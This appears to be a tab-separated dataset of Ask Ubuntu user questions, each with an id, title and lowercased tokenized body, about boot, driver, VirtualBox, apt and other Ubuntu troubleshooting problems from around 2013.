386269	how to create a .bz2 file from a directory without using tar ?	i 've been searching on the internet and used archiver to make .bz2 files . my archiving tool only makes tar.bz2 and my game host does n't read that . it reads .bz2 files only . is there a way to make a directory into a .bz2 file ? i 've tried sudo bzip2 but it does n't accept directories .
386271	usb modem changes product id on upgrading to 13.10	till yesterday , i was successfully using the reliance netconnect + usb modem ( vendor id : 0x19d2 , product id : 0xffe9 ) . this morning , i happened to upgrade to 13.10 and voila ! the product id has changed from ffe9 to fff5 ! what did the ubuntu guys do here ? any clues to solving this problem ?
386273	how to set ubuntu as default os , xps 15 ?	i dual boot on xps 15 , the only problem is when i start it up , it defaults to windows . i have to shut it down again , start it up while holding f12 , select ubuntu , and select ubuntu at the grub screen . is there an option to change this behavior ?
386277	does microsoft office 2003 work well on ubuntu ?	i have office 2003 and need to know if it works well in the ubuntu environment ?
386279	mini pci gps module	i 'm new to ubuntu and i could n't find anything about an internal gps for a laptop . i have a 12 '' hanspree netbook with an empty internal minipci slot and i 'd like to make this my onboard chart plotter for sailing . my chart plotting software is opencpn and can accept a gps signal . now the question is , can i just plug in a gps module into the port and the os will recognize it ? it looks like i may still need an external antenna , should i just get a usb gps receiver ?
386281	error while loading shared libraries ( libglu.so.1 )	i am trying to run chamsys magicq on ubuntu 12.10 with 64bit amd processor . this is what it tells me when i try to run the program . ./magicq : error while loading shared libraries : libglu.so.1 : can not open shared object > file : no such file or directory here is the list of library dependencies for magicq : austin @ ubuntu : ~/magicq $ ldd ./magicq linux-gate.so.1 = > ( 0xf7799000 ) libglu.so.1 = > not found libusb-0.1.so.4 = > not found libqt5printsupport.so.5 = > not found libqt5opengl.so.5 = > not found libqt5widgets.so.5 = > not found libqt5network.so.5 = > not found libqt5gui.so.5 = > not found libqt5core.so.5 = > not found libgl.so.1 = > /usr/lib32/fglrx/libgl.so.1 ( 0xf7694000 ) libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0xf7679000 ) libstdc++.so.6 = > not found libm.so.6 = > /lib/i386-linux-gnu/libm.so.6 ( 0xf764d000 ) libgcc_s.so.1 = > /lib/i386-linux-gnu/libgcc_s.so.1 ( 0xf762e000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xf7483000 ) libxext.so.6 = > not found libatiuki.so.1 = > /usr/lib32/fglrx/libatiuki.so.1 ( 0xf746c000 ) libdl.so.2 = > /lib/i386-linux-gnu/libdl.so.2 ( 0xf7467000 ) /lib/ld-linux.so.2 ( 0xf779a000 ) i know libglu.so.1 is in /usr/lib/x86_64-linux-gnu as a `` link to shared library ( application/x-sharedlib ) '' link target : `` libglu.so.1.3.1 '' how do i fix this ?
386282	update manager gives an error message	i have ubuntu 12.04 on an hp mini 110 netbook . i have had it for 18 months and it works great . but last night update manager downloaded a large batch of files ( about 75 mb ) mostly having to do with a new linux kernel . when i tried to install the updates , most were installed but two did not : header files related to linux kernel version 3.2.0 and linux kernel headers for version 3.2.0 on 32 bit x86 smp . i tried to install these files again but each time it gives me a box saying the package system is broken and tells me to run the following command in a terminal : apt-get install -f when i open the terminal and type the command , i get the following : e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? in a separate notification , it tells me the error message was : 'error : brokencount > 0 ' . this usually means that your installed packages have unmet dependencies . since this happened , i can not get a wireless connection to the internet . i do n't know what to do . is there a way to uninstall the files that were installed last night ? my netbook has only a 16gb hard drive and i 'm wondering if that has something to do with the error . please help . $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-headers-3.2.0-57 linux-headers-3.2.0-57-generic-pae the following new packages will be installed : linux-headers-3.2.0-57 linux-headers-3.2.0-57-generic-pae 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/12.7 mb of archives . after this operation , 67.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 895015 files and directories currently installed . ) unpacking linux-headers-3.2.0-57 ( from ... /linux-headers-3.2.0-57_3.2.0-57.87_all.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-57_3.2.0-57.87_all.deb ( -- unpack ) : unable to create '/usr/src/linux-headers-3.2.0-57/sound/sh/kconfig.dpkg-new ' ( while processing './usr/src/linux-headers-3.2.0-57/sound/sh/kconfig ' ) : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) unpacking linux-headers-3.2.0-57-generic-pae ( from ... /linux-headers-3.2.0-57-generic-pae_3.2.0-57.87_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-57-generic-pae_3.2.0-57.87_i386.deb ( -- unpack ) : unable to create '/usr/src/linux-headers-3.2.0-57-generic-pae/include/config/v4l/mem2mem/drivers.h.dpkg-new ' ( while processing './usr/src/linux-headers-3.2.0-57-generic-pae/include/config/v4l/mem2mem/drivers.h ' ) : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-headers-3.2.0-57_3.2.0-57.87_all.deb /var/cache/apt/archives/linux-headers-3.2.0-57-generic-pae_3.2.0-57.87_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i do n't understand most of that , but it seems to indicate that my hard disk is full . i do n't save many files to my hard disk . if it is full , it 's because i get updates installed to my system every few days from ubuntu . do you have any suggestions what to do ? i started entering the group of commands . when i entered : sudo apt-get autoremove i got : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-headers-generic-pae : depends : linux-headers-3.2.0-57-generic-pae but it is not installable e : unmet dependencies . try using -f. when i entered sudo apt-get update : err http : //security.ubuntu.com precise-security release.gpg could not resolve 'security.ubuntu.com' err http : //archive.canonical.com precise release.gpg could not resolve 'archive.canonical.com' err http : //us.archive.ubuntu.com precise release.gpg could not resolve 'us.archive.ubuntu.com' err http : //extras.ubuntu.com precise release.gpg could not resolve 'extras.ubuntu.com' err http : //us.archive.ubuntu.com precise-updates release.gpg could not resolve 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com precise-backports release.gpg could not resolve 'us.archive.ubuntu.com' reading package lists ... done w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/release/gpg could not resolve 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/release.gpg could not resolve 'us.archive.ubuntu.com ' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/release.gpg could not resolve 'us.archive.ubuntu.com' w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/release.gpg could not resolve 'security.ubuntu.com' w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/release.gpg could not resolve 'extras.ubuntu.com' w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/release.gpg could not resolve 'archive.canonical.com' w : some index files failed to download . they have been ignored , or old ones used instead . when i entered sudo dpkg -- configure -a , i got : dpkg : dependency problems prevent configuration of linux-headers-generic-pae : linux-headers-generic-pae depends on linux-headers-3.2.0-57-generic-pae ; however : package linux-headers-3.2.0-57-generic-pae is not installed . dpkg : error processing linux-headers-generic-pae ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-headers-generic-pae ( = 3.2.0.57.68 ) ; however : package linux-headers-generic-pae is not configured yet . dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-headers-generic-pae linux-generic-pae when i entered : sudo apt-get install -f , i got : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : linux-generic-pae linux-headers-generic-pae 0 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 65.5 kb disk space will be freed . do you want to continue [ y/n ] : y ( reading database ... 895014 files and directories currently installed . ) removing linux-generic-pae ... removing linux-headers-generic-pae ... the upshot of all this is i am no longer getting error messages , but my wireless connection is still not working . when i click on edit connections , the network connections box still lists my verizon fios router essid and the connect automatically box is still checked , but for some reason i am still not connecting . what should i do ?
386285	mouse curser disappearing ( but still being captured ) on virtualbox	host : mac osx 10.9 guest : ubuntu 13.04 virtualbox : 4.3.4 ( just updated ) i 'm having issues when i install guest additions ( via device > add guest additions ) at the very beginning it tells me that it ca n't find the host kernel ( with a message saying that if the installation of guest additions fails it may be because of this ) - but then it seems to install the rest fine . the only issue is after i install guest additions and reboot my guest device , there seems to be an issue displaying my mouse . the click works fine if i manage to navigate it over to where it should be - but i just ca n't see where my mouse is . any help ? : | also , for some reason i 'm unable to disable mouse integration ( it 's just greyed out under my machine tab ) .
386287	desktop problem	first time using ubuntu . i installed 13.10 and now when i start up the system it prompts me for a login . i login just fine , but once it loads there are no icons or menu of any kind . i can left click and drag to make boxes , and i can access all the options from right clicking ( such as new folder , new document , change desktop background , etc . ) but that is it . i 've read some forums about people logging out and switching to 2d , but i do n't seem to have that option . any and all help is much appreciated .
386288	ubuntu 12.04 lts fails to boot after linux kernel update and restart on intel® core™ i7-3720qm cpu @ 2.60ghz × 8 laptop	i did the most recent updates as i regularly do but this time i got the black screen of death after restarting . no way i can get the system to boot even though the boot options and bios settings look right to me . i ran ubuntu 12.04 from a cd and i can see the hd partitions but ca n't access the files because i am not the owner ( owner : 1000 - user # 1000 ) . what is the best way to recover my data ? what boot recovery tools are safer/easier to use ? i wonder if this happens to other distros that have a reputation for more testing like fedora or opensuse . any comments would be welcome on this subject . thanks , pablo
386291	nofile limit not changed for sh command in non-interactive session	running 12.04.3 lts a user submitting a batch job to the queue was receiving a 'too many open files error ' investigation suggested changing the /etc/security/limits.conf file which has been done both for all users and for root individually specifying hard limits of 65536. ulimit -a returns the limit of 65536 . also the /etc/pam.d/ common-session , common-session-noninteractive , login , and ssh files have all had the line session required pam_limits.so added . the problem persists and can be seen when looking at the /proc/pid/limits file for processes listed using lsof . here the nofile limit for processes listed as sh under command remains as soft limit of 1024 and hard limit of 4096 which were the original system defaults . the limits for other processes , for example those with command grep , have changed to the new 65536 limit . as written , the script being run requires a short burst of a large number of open files from which individual entries are being collected and transferred to another composite file . the failure always occurs at the 512th file which seems to indicate that it is bumping into the limit . what needs to be changed to increase the limits for the commands falling under sh ?
386299	what is root-a and why wo n't it mount ?	i put ubuntu 12.04 lts on my acer chromebook , then previously upgraded my ram with an 8gb ddr3 stick . for awhile , everything was working fine , then one day i got a message after booting saying , '' invalid oi mem size , you may experience problems.. '' sure enough , after booting completely and logging in , i found two root-a disk drivers in the home folder that was n't able to mount . when i tried mounting them , i got this message : '' error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sda5 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so ... '' i took out the memory stick that was already in the laptop and now i only have the 8gb one in , and i am completely sure that that is n't more than the system can handle . my question is why and what is this root-a ?
386301	need help running unbuntu on oracle virtual box	i 've been using windows for years and thought i 'd give linux a try . as listed in the title , i 'm trying to run ubuntu through oracle 's virtual box . when i go to the install for ubuntu , i get a black screen saying that the kernel version i am currently using is i686 rather than the x86-64 cpu ... .where do i go from here ?
386303	change display size in virtualbox	host : osx 10.9 , guest : ubuntu 13.04 , virtualbox : 4.3.4 i 'm having issues installing guest additions ( i know how to do it and i 've tried multiple different ways - it seems to install correctly but then my mouse cursor disappears so i do n't want to go this route . pretty sure it 's a bug because this worked prior to updating to the newest version of virtualbox 4.3.4 ) any other way to get my vm to go fullscreen ? i 'll probably just give up on mouse scrolling since i do n't know if there 's any way to get that to work without guest additions , but if anyone has any suggestions on that it would be great too .
386305	what to do after one kills their kernel 12.10	i was attempting to reduce /boot by removing some of my older kernel images and the like . some how i was sidetracked , and inadvertently removed all of my images and supporting files . i did an apt-get and pulled down the latest kernel and header available . when i rebooted , i found that my display with wrong sized , i had no wireless or even wired interfaces available to me and no sound . i booted using my ubuntu 12.10 cd and thought i could come up with some rescue plan to at least get my wireless networking capabilities back . so far no success , so i am now living off my cd booting off of that . and suggestion on how to get my networking back in place , so i can start building my machine back . everything works , except for the aforementioned issue !
386306	recover zapped gpt	i 'm dual booting ubuntu 13.10 beside windows 8 , and was having some problems with the installer not detecting windows 8 . i followed the suggestions in this answer : http : //askubuntu.com/a/287862/118240 to use gdisk to zap the gpt table . after that , i could not boot into windows 8 ; the boot goes directly to the usb drive with ubuntu . anyways , fortunately i had created a backup with the gdisk 'b ' command . i restored the backup with 'r ' , 'l ' , and 'w ' . now , upon loading , gparted shows the error : /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted - possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? when i click yes , gparted shows my partitions , but with red errors that make me nervous : running sudo gdisk /dev/sda shows this : partition table scan : mbr : not present bsd : not present apm : not present gpt : present found valid gpt with corrupt mbr ; using gpt and will write new protective mbr on save . i do n't have proof , but i 'm 95 % sure that before i zapped the gpt table , mbr said something other than not present . and i 'm 50 % sure it was n't present , but i ca n't remember what ( i 'll probably remember in a few days when this is solved ... ) . i do n't have any important data on windows ( i just purchased the computer ) , but i 'd rather not have to re-install it ( i 'm do n't know if i 'd have to re-purchase windows 8 , as it shipped already installed on the computer and i do n't have a cd ? ) . anyways , can i safely write a new protective mbr with gdisk ? will that preserve my partitions , or have i done too much damage already ? if not , are there any steps i can take ?
386309	can i use wubi to preview ubuntu without a full install ?	i 'd just like to preview ubuntu without making a dedicated install . currently , my laptop wo n't boot ubuntu from a live disk or a flash key ... does wubi bypass the preview stage and just install the os directly ?
386311	how can i stop less from storing history ?	every time i search for a term in less , it stores my search in the file .lesshst . how can i stop this behavior ?
386313	crontab formats	i want to run few crontabs at startup and also at regular intervals . i have used the below format - # m h dom mon dow 0 7-21/2 * * * //this will run daily from morning 7:00 to 21:00 clock with interval of 2hours each . ie . 7 , 9 , 11 , 13 and so on . @ reboot //this will run everytime the system reboots */20 7-21 * * * //this will run for every 10 minutes from 7:00 to 21:00 clock 0 7-21/4 * * * //this will run for every 4hours from 7:00 to 21:00 clock these are the 2 different cronjobs ive set . i doubt if this works well . please suggest changes required , if any . thanks .
386314	`` waited for * || true but it was n't there `` each time i run apt	every time i try to install anything with apt-get , i get this error e : waited for /usr/sbin/dpkg-preconfigure -- apt || true but it was n't there e : failure running script /usr/sbin/dpkg-preconfigure -- apt || true i have looked at many forums but none of them seem to have any answer . any help would be much appreciated at this time ! ( everything must be done via command line , 13.04 server ) tried braiam 's command , this was the output + command : sudo sh -c `` echo 'dpkg : :pre-install-pkgs { `` /usr/sbin/dpkg-pr econfigure -- apt || true '' ; } ; ' > > /etc/apt/apt.conf.d/70debconf '' [ sudo ] password for swech : -- apt : 1 : -- apt : syntax error : unterminated quoted string -bash : true ; } ; ' > > /etc/apt/apt.conf.d/70debconf : no such file or directory
386315	how to add libraries path to the ./configure command ?	i would like ./configure to link to a library and some include files . my library is stored in /home/foo/sw/lib/ and my files are stored in /home/foo/sw/include . ./configure -- help throws out the following : some influential environment variables : cc c compiler command cflags c compiler flags ldflags linker flags , e.g . -l < lib dir > if you have libraries in a nonstandard directory < lib dir > libs libraries to pass to the linker , e.g . -l < library > cppflags ( objective ) c/c++ preprocessor flags , e.g . -i < include dir > if you have headers in a nonstandard directory < include dir > cpp c preprocessor i have tried various combinations : ./configure -- prefix=/home/foo/sw -i < /home/foo/sw/include > -l < /home/foo/sw/lib/ > ./configure -- prefix=/home/foo/sw -i=/home/foo/sw/include -l=/home/foo/sw/lib/ ./configure -- prefix=/home/foo/sw -i/home/foo/sw/include -l/home/foo/sw/lib/ etc.. but i ca n't seem to get the syntax right . if anyone can help me out , that would be greatly appreciated . thanks !
386318	upgrade to 12.04 failed . boot into command line window and cant boot with live usb .	i started an upgrade to 12.04 but stalled during install . now , the system boots directly into command window where i must sign in . i tried creating a bootable usb ( no cd drive installed ) with unetbootin and universal usb installer , but the system do not boot to usb first - goes directly to hard drive . i tried accessing the grub menu with all suggested commands ( ex holding shift , f1 , esc , f10 , f12 etc etc etc ) but none worked . how can i install the new version 12.04 lts from usb ? is there any way to install from command line ? or how can i access grub settings from command ? please please please help !
386320	dell latitude e6230 webcam	hi i am new to ubuntu i am running ubuntu 13.10 on a dell latitude e6230 . i am unable to use my webcam for some reason . also have some problems with flash on certain webpages . is there anyone that has come across this problem ? anyone know of a fix ? paolo
386322	memorystickdrive has been connected	yesterday i have installed last updates on my ubuntu 12.04 . today i am getting memorystickdrive has been connected , securitydigitaldrive has been connected , compactdrive has been connected every 2 3 minutes . what does this mean and how to be with that ? this is screenshot :
386325	are there any issues with installing ubuntu linux on a portable hard drive under uefi secure boot ?	i just purchased an hp pavilion 17 notebook pc 17-e055nr . i wanted to install ubuntu on a western digital 120 gb ( wd1200u017-001 ) portable hard drive , while leaving the windows 8 installation on the internal hard drive undisturbed . this is my first attempt at installing ubuntu on a uefi secure boot machine . the procedure used is : 1 ) download the livedvd image , ubuntu-12.04.3-desktop-amd64.iso . 2 ) use `` start up disk creator '' on an existing ubuntu machine to create a liveusb stick . 3 ) use gparted on an existing ubuntu machine to delete all partitions on the portable hard drive . 4 ) disconnect the internal hard drive in the laptop ( this is unnecessary but insures the internal drive is not altered ) . 5 ) boot the laptop with the liveusb stick and install ubuntu on the portable hard drive . 6 ) reconnect the internal hard drive to the laptop . 7 ) in the bios setup , use boot options to change the uefi boot order ( a. usb hard disk , b. os boot manager ) . when powered up , if the portable drive is attached then ubuntu loads . if the portable drive is not attached then windows loads . the procedure initially worked and i was able to boot ubuntu from the portable drive once . after shutting down , the laptop never again recognized the portable drive as a bootable device . i repeated the above procedure with no success . thinking the western digital portable drive was at fault , i switched to a toshiba 1 tb canvio basic 3.0 portable hard drive . the procedure worked . i was able to boot from the toshiba drive several times . then the hp laptop continually failed to recognize the toshiba drive as a bootable device . as an experiment , i used the above procedure on an acer aspire 5102wlmi ( non uefi secure boot ) laptop and the western digital portable hard dirve . everything worked fine on the acer laptop . i tried to boot the hp laptop with the western digital drive created but the hp laptop failed to recognize a bootable device . through out this endeavor , the hp laptop consistently recognized and booted ubuntu from the liveusb stick . i am not sure where the problem is : a ) the hp pavilion 17 notebook pc 17-e055nr hardware b ) the insyde f.17 bios c ) ubuntu 12.04.3 the lack of a stable ubuntu install is unacceptable . my only options now seem to be update the bios , a direct install onto the internal hard drive , or to return the hp laptop to the store . my thinking is to return the laptop and wait another year for the uefi technology to mature a bit more . any thoughts or comments would be most welcomed .
386326	using ubuntu 12.04 live from usb stick first time user id and password	i just created a usb flash drive with 12.04 live . when it starts up it asks for a user id and password . what are they ?
386332	unity tweak tool is giving an error : com.canonical.notify-osd	i just installed unity tweak tool but have n't been able to use it due to the error it keeps giving , which is : com.canonical.notify-osd i tried looking it up but have n't come up with anything so far . how can i fix this issue ?
386337	need help to install ubuntu 13.04 along with win 8 for the first time	i used to work windows but now i tried to instal ubuntu 13.04 64 bit in my hp 2231tx notebook alongside windows 8 with bootable cd but after restarting its showing wubibr.ldr is missing . can anyone hel me ? ? ? ? if anyone can help me to solve this problem i 'll be thankful ...
386343	install ubuntu 13 in 32 bit windows 7 professional	i am new user to ubuntu . i have downloaded ubuntu 13. in my lap i have windows 7 professional 32 bit os . how can install ubuntu . can you please tell me the procedure . thank you in advance..
386344	please remove installation media and close tray message inside virtual box	i 'm trying to install ubuntu 13.10 inside a virtual machine running in windows 7 . i 've been getting this message every time after the installer asks for a restart . what should i do ?
386345	after rotating the screen to clockwise ( portrait mode ) , the mouse , touch screen calibration is lost	when i rotated the screen to fit the screen layout , all the mouse cursor inputs are lost . this is a brand new hp eliteone 800 all-in-one touch pc . any idea how to fix the mouse/touch screen inputs ?
386346	how to resize a pdf from 1mb to 400kb	i have a pdf file that is 1.1mb of size but i need upload 400kb of that file . please tell me how to resize the file to get an output of 400kb .
386347	download apps ( in windows ) from apps.ubuntu.com	as i ca n't connect from ubuntu 12.04 to internet , i want to download apps from windows xp system and then install to ubuntu ( offline ) . any app page i visit , all i see is a link to download ubuntu and nothing else . is it mandatory to visit from ubuntu itself ? googling never even gives any such questsion/answer . i do n't know why no one even bothers to ask it or maybe i 'm doing the most stupidest thing ! i 'm ok to list out dependencies one by one and downloading each one of them . still i 'm left helpless . apt-get is a distant fantasy and that will not work for me ! how to solve this ?
386348	ubuntu 12.04 on dell studio 1558 laptop ?	i was just wondering if it would be possible to put 12.04 on my dell studio 1558 . i was poking around the ubuntu website , and other websites and was unable to find any specific drivers for this model of laptop . does anyone know where i could find the appropriate drivers so i can get a better grip if ubuntu is right for me ? thank you
386349	trying to install cuda on ubuntu 13.10 amazon g2.2xlarge gpu cluster	does anybody know a way to do this ? i have tried the following from ... http : //vasir.net/blog/opencl/installing-cuda-opencl-pyopencl-on-aws-ec2 http : //installion.co.uk/ubuntu/saucy/multiverse/n/nvidia-cuda-toolkit/install.html but it seems hopeless , because every time it ends up in some kind of package dependency error like this ... ubuntu @ ip-10-33-136-37 : ~ $ sudo apt-get install nvidia-cuda-toolkit reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nvidia-cuda-toolkit : depends : nvidia-profiler ( = 5.0.35-7ubuntu1 ) but it is not going to be installed depends : nvidia-cuda-dev ( = 5.0.35-7ubuntu1 ) but it is not going to be installed recommends : nvidia-visual-profiler ( = 5.0.35-7ubuntu1 ) but it is not going to be installed any help would be appreciated , this is driving me up the wall .
386352	minimize all windows by pressing windows with d in ubuntu like windows	how can i minimize my all open windows by pressing windows+d in ubuntu ? i can do this in windows easily but with ubuntu i do not know how to do .
386353	ubuntu 10.04 lts	ok i have a windows xp professional 2003 and there 's ubuntu on it but the thing is ubuntu administrator password is set in spanish and it 's very tricky it 's `` veinteynueve on diezyocho '' or just `` dieyocho '' i want to delete the administrator but i do n't know how can anybody help me out here i can not fully access this laptop i want to use this for mu online school .
386358	any chance for me to install ubuntu on laptop asus n61 jq-x1 ?	i bought this laptop ( asus n61jq -x1 ) 2 years ago , till now i 'm using window 7 64bit i wan na change os for my laptop and ubuntu is an advice that `` google '' gave me , but im not sure that ubuntu has all drivers for my laptop or not because there are no linux/ubuntu driver for my model from asus http : //www.asus.com/support/download/3/217/n61jq/8/ please help me , tell me if i have any chance on this
386360	set default desktop resolution when no monitor	background : i am using a ubuntu 12.04 with x11vnc server . normally i do not connect the monitor to this computer . so it has some resolution issue . after few days of research i found this answer and it works fine . ( paste following code in terminal ) cat < < eof > /etc/x11/xorg.conf section `` device '' identifier `` default device '' option `` nologo '' `` true '' endsection section `` monitor '' identifier `` configured monitor '' endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` default device '' subsection `` display '' depth 24 virtual 1280 720 endsubsection endsection eof sudo chmod 644 /etc/x11/xorg.conf problem : now it 's working properly when i access via vnc , but when i connect a monitor to that machine sometimes it goes to resolution ( 640*480 ) . i need to access this machine with and without a monitor . what am i doing wrong ?
386362	how to make ( k ) ubuntu 13.10 automatically wake from suspend ?	to put it short : in order to save energy i would like to be able to wake the computer at certain time from suspend ( any working suspend method will suffice ) . computer is hp pavilion p6-2068sc desktop pc with kubuntu 13.10 . linux 3.11.0-14-generic # 21-ubuntu smp tue nov 12 17:04:55 utc 2013 x86_64 x86_64 x86_64 gnu/linux i have tried different approaches ( rtcwake included ) but with no success . the wake up works perfectly though if i just press the return from keyboard when suspended . there seem to be a couple of related questions : rtcwake not resume after suspend to disk automatically sleep and wake-up at specific times
386363	paste path location in open file dialog - notepad++	i have installed notepad++ on ubuntu 13.10 on wine . but when i open open file dialog and paste the file location path in file name text box ( ex : /home/chandrayya/ddrive ) , i am getting an error saying `` / '' character is not allowed . but when i re-entered the path as \home\chandrayya\ddrive it is working fine . is there any settings in wine/notepad++ to take /home/chandrayya/ddrive as valid path when i type /home/chandrayya/ the file name text box not shows the folders inside /home/chandrayya as its shows on windows . is it possible to show the contains of folder as and when we type in file name text box of `` open file dialog ''
386368	logout suspends after installation of nvidia graphic driver in 13.10	i 'm a desktop user . i have installed nvidia graphic driver [ geforce gt 520 ] from software & updates > additional drivers . i did a reboot and logged in again when installation was finished . i could login without any problem . but i found logout error after installation of nvidia graphic driver . how can i fix this problem ? please give me some advice . here are some of my specs : memory - 4gb processor - intel ( r ) pentium ( r ) dual cpu e2180 @ 2.00ghz graphic - geforce gt 520 os - ubuntu 13.10 64-bit
386371	âno network devices availableâ for bcm43241 ( sdio ) after fresh install of 13.10	i have a laptop vaio duo 13 which has a broadcom 43241 wireless card . my problem is similar to this one broadcom wi-fi adapter not recognized . i tried to install the driver brcmfmac ( sdio ) here http : //wireless.kernel.org/en/users/drivers/brcm80211 and copied the nvram to /lib/firmware/brcm as the page tells , but this did n't work . most questions i searched are about br43 such as how to install broadcom wireless drivers ( bcm43xx ) . i tried part of solution like unblock all in rfkill , put an # in front of blacklist bcm43xx , but none worked . i did n't uninstall or install any drivers such as b43-installer , b43legacy-installer , bcmwl-kernel-source ( only tried b43-fwcutter ) because they are not compatible with bcm43241 . above is all information i can provide for help . thanks .
386373	compatible laptop with port replicator	has anybody got ubuntu running on a modern laptop with a usb3.0 port replicator ? specifically running additional monitors . i want to move my work machine away from a desktop to a docked laptop . and i do n't want to have to plug in power , keyboard , mouse , monitors and net every morning . i 've been looking at two machines : lenovo thinkpad 440s the linux compatibility looks good but according to forums the usb3.0 dock display does n't work , and the manufacturer has no interest in making it work . i hear better things about the usb2.0 replicator but i do n't know if it works with this pc dell precision m3800 dell have a `` baby brother '' to this with official ubuntu support and i 've read this one works well too . the recommended dock is also usb3.0 and i ca n't find any info on linux support for it . no response from dell either i 'm open to other options but i do need lots of ram and lots of ssd . i 'd love to hear from anyone who has something like this working . if i ca n't find a solution soon i 'm going to have to buy a mac . and i really do n't want to do that !
386379	change user wallpaper to default and block it	i am a root user and i want to set default wallpaper in another user and block it from being changed . how to do it via terminal ?
386380	why is it on startup it takes me to a terminal login and vty instead of lightdm ?	i recently upgraded from ubuntu 12.04 to 12.10 but when i restarted my laptop ( dell d630 , intel core duo , 8 gb of ram ) it now starts ubuntu on this coding screen that i do n't quite understand . sorry if this is a bad question to ask but i really do n't understand , when i start it up every time i end up on a black screen that asks for my login info , i type that in and then it just stays on the black screen and i can run commands but i ca n't get the actual system to starup , can someone please help ?
386382	can not find /etc/apache2/sites-available/default when configuring apache	i followed the instruction here to configure a php development environment . first : sudo tasksel install lamp-server it succeeded , and it works ! is outputted in http : //localhost/ . then : sudo cp /etc/apache2/sites-available/default /etc/apache2/sites-available/mysite an error happened here : cp : can not stat â/etc/apache2/sites-available/defaultâ : no such file or directory i 'm using ubuntu 13.10 . i searched the web but did n't get anything that looked promising . can anyone point me in the right direction ? edit : $ ls /etc/apache2/sites-available 000-default.conf default-ssl.conf
386384	how to install ubuntu in my msi notebook	i am having a msi x320 notebook ... will the ubuntu 12.04lts run smoothly in it ? will all the features work ? im asking this as msi x320 will not support many of the linux distributions ...
386387	wifi in ubuntu 12.10	i am not able to properly install the driver for the wifi card for ubuntu 12.10 on my dell inspiron 17-3721 . i do not mind installing another linux distribution as mint , etc ... if it was recommended . thank you , sincerely .
386388	trying to set up ubuntuone on a remote server	i am trying to set up ubuntuone on a remote server in headless mode to accommodate backups . i have followed the instructions on , https : //wiki.ubuntu.com/ubuntuone/headless however the file required on point 4 does not exist . help !
386389	display flicker on movies , websites , animation on ubuntu 13.10 / nvidia restricted driver	i have been running ubuntu 12.10 ( linux mint 14 ) with the proprietary nvidia-updates driver without any problems ( i do n't know the version from that repository by heart ) recently , i installed ubuntu 13.10 ( linux mint 16 ) and activated the nvidia-319-updates driver . now it turns out that my screen is flickering ( constantly , as opposed to similar questions ) during certain tasks . watching a movie using the default movie player watching videos on youtube zooming in/out on google maps in all browsers but not scrolling the map entering/leaving folders in nemo/nautilus the flicker is like watching interlaced video footage with the fields reversed . or like something is double buffered but the buffers are displayed in the wrong order . why is this happening ? how do i fix this ?
386391	problem in finding the lsystem file drive in ubuntu 12.04	am new to linux/ubuntu . mayb finding it difficult to access all the features . i have dual booted ubuntu 12.04 along with windows 7 using wubi.the installation is done in separate drive g : where the windiws is in drive c : i started ubuntu 12.04 after reboot everythng works fine and showing all the drives alongwith drive g .after i unmounted the drive from the desktop panel to get rid of the unneccesary drive list . now i could not find it in home folder drive list . showing all the drives after unmounting but the drive g is not found.tried to look into some tutorials but no success.and 1 more thing i can see the config files of windows like desktop.ini in all the drives which i think is hidden from using windows . what happen if i delete the file from ubuntu desktop.ini . will it affect windows later ? thnx
386392	problem in opening sdk manager in eclipse	when i click on android sdk manager , a window pops up and says opening sdk manager shortly but then the window collapses and nothing happens
386393	keyboard layout in ubuntu 13.10 changes after restart	i 've set my keyboard layout to be irish but every time i restart the machine it reverts to some other layout ( although it still says irish in the settings ) .
386394	wrong audio level indication	volume indicator in panel shows wrong info . for instance when i decrease it to like % 60 , its zero at and below this value in real.that happens on different distros.here is my audio adapter 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 )
386396	find command not available in grub 2 terminal	i went through this document of gparted . under the heading fixing grub boot problem it mentioned using find command . but i do n't find the command when i run . while booting my ubuntu 13.04 , in grub 2 menu i pressed 'c ' to enter grub 2 terminal . there when i run find , it does n't recognize the command but the document uses this command .
